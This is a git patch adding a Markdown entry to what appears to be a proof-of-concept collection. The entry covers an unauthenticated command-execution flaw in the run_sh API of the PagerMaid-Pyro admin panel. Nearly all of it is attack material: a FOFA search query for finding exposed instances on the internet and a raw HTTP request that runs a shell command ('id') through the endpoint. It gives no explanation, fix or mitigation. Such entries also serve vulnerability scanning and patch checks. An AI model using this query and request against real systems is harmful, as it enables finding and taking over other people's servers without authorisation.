From fdf01993c78c5c78a82e3f0412738fdb420f60c1 Mon Sep 17 00:00:00 2001
From: Rainyseason <73454853+Rainyseason-c@users.noreply.github.com>
Date: Wed, 11 Jun 2025 14:57:58 +0800
Subject: [PATCH] =?UTF-8?q?Create=20PagerMaid-Pyro=E5=90=8E=E5=8F=B0?=
 =?UTF-8?q?=E7=AE=A1=E7=90=86=E7=B3=BB=E7=BB=9Frun=5Fsh=E6=8E=A5=E5=8F=A3?=
 =?UTF-8?q?=E5=AD=98=E5=9C=A8=E6=9C=AA=E6=8E=88=E6=9D=83=E5=91=BD=E4=BB=A4?=
 =?UTF-8?q?=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...d-Pyro后台管理系统run_sh接口存在未授权命令执行漏洞.md | 14 ++++++++++++++
 1 file changed, 14 insertions(+)
 create mode 100644 wpoc/PagerMaid-Pyro后台管理系统/PagerMaid-Pyro后台管理系统run_sh接口存在未授权命令执行漏洞.md

diff --git a/wpoc/PagerMaid-Pyro后台管理系统/PagerMaid-Pyro后台管理系统run_sh接口存在未授权命令执行漏洞.md b/wpoc/PagerMaid-Pyro后台管理系统/PagerMaid-Pyro后台管理系统run_sh接口存在未授权命令执行漏洞.md
new file mode 100644
index 0000000..ba2fe7a
--- /dev/null
+++ b/wpoc/PagerMaid-Pyro后台管理系统/PagerMaid-Pyro后台管理系统run_sh接口存在未授权命令执行漏洞.md
@@ -0,0 +1,14 @@
+# PagerMaid-Pyro后台管理系统run_sh接口存在未授权命令执行漏洞
+
+# fofa
+title="PagerMaid-Pyro" && body="href=\"https://xtaolabs.com/pagermaid-logo.png\""
+
+# poc
+```
+GET /pagermaid/api/run_sh?cmd=id HTTP/1.1
+Host: 
+Accept-Encoding: gzip, deflate
+Accept: application/json, text/plain, */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+```